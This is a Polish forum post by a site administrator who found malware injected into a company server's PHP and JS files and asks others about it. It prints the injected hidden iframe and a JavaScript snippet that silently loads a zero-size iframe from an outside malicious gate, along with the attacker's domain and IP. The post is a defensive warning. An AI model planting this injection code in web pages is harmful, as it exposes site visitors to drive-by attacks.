Zastanawiałem się czy Hydepark czy może Serwery www, ale ostatecznie pisze tutaj. Dziś na serwerze znalazłem wpięty nakońcu index.php skrypt
Kod
<iframe src=http://unclesammm.com/gate.php?f="różne_id_liczbowe"  frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe>

OK, myślę sobie, standardowa procedurka, usunięcie z plików itp, nie problem. Zastanawiam się jednak którędy wszedł. Nie zapisuję haseł w Filezilli, oprogramowanie zabezpieczające na kompie aktualne. Podejrzewam, że skrypt jest dziurawy, bo trochę czasu powstał zanim do firmy przyszedłem i jest tak stary, że jeszcze session compatibility warning łapał z tego co widziałem. Chciałbym jednak sie dowiedzieć, czy są osoby, które z tym "wujkiem" zetkęły. Nie tylko się bowiem dodał na koniec, ale i z racji "leciwości" skryptu miał problem by pozostać niezauważony. Skopał bowiem dołączanie się do pliku i strona sypnęła syntax errorem. Tak go zauważyła osoba, która z owym skryptem pracuje i mnie powiadomiła. Ona dostępu nawet nie ma z poziomu ftp... Jedynie zalogowanie i użycie skryptu. Na pewno zmodyfikuję go tak, by zlikwidować mu potencjalne metody wejścia z poziomu formularzy, ale chciałbym wiedzieć, czy aby gdzieś indziej nie powinienem pogrzebać, bo się ukrył kopią czy coś w ten deseń. Dziękuje z góry za wszelką informację na temat tego konkretnego złośliwca, bo google skąpe informacje podaje i w zasadzie tylko mi powiedział, że to syfek. Nic więcej nie chciał smile.gif

EDIT: Tak dla czytających. Jest to skrypt najprawdopodobniej już zablokowany, gdyż odwołania na domenę dają url not found, ale szkodnik modyfikuje napotkane pliki php z layoutem doklejając wspomniany iframe. Dodatkowo dokleja swój kod także do plików JS i z tego co wyłapałem, działa głównie łacząc sie z IP 178.63.141.211 oraz w pierwszej kolejności chcąc uzyskać dostęp do pliku z rozszerzeniem qpi w katalogu głównym domeny. Uważajcie więc na logi FTP, gdy coś w tym stylu wystąpi, bo to może być sygnał o problemie. Skrypt wbija się poprzez złamanie hasła do FTP któregoś z userów. Potem robi to, co opisałem.

EDIT2: By było łatwiej, umieszczam co dokleja chłopak do plików, zawierających tag </body> w php:
[HTML] pobierz, plaintext 
  1. <!--qpi--><!--/qpi-->
  2. <!--qpi--><iframe src=http://unclesammm.com/gate.php?f=IDENTYFIKATOR   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->
[HTML] pobierz, plaintext

oraz w JS:
[JAVASCRIPT] pobierz, plaintext 
  1. /*qpi*/
  2. function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
  3. var e=new Date();e.setTime(e.getTime()+(2592000000));
  4. if(!g()&&window.navigator.cookieEnabled)
  5. {
  6. 	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
  7. 	window.setTimeout(function(){
  8. 		var JSinj=document.createElement('iframe');
  9. 		JSinj.src='http://unclesammm.com/gate.php?f=IDENTYFIKATOR&r='+escape(document.referrer||'');
  10. 		JSinj.width='0';
  11. 		JSinj.height='0';
  12. 		JSinj.frameborder='0';
  13. 		JSinj.marginheight='0';
  14. 		JSinj.marginwidth='0';
  15. 		JSinj.border='0';
  16. 		try{
  17. 			document.body.appendChild(JSinj);
  18. 		}catch(e){
  19. 			document.documentElement.appendChild(JSinj);
  20. 		}
  21. 	}, 2000);
  22. }
  23. /*qpi*/
[JAVASCRIPT] pobierz, plaintext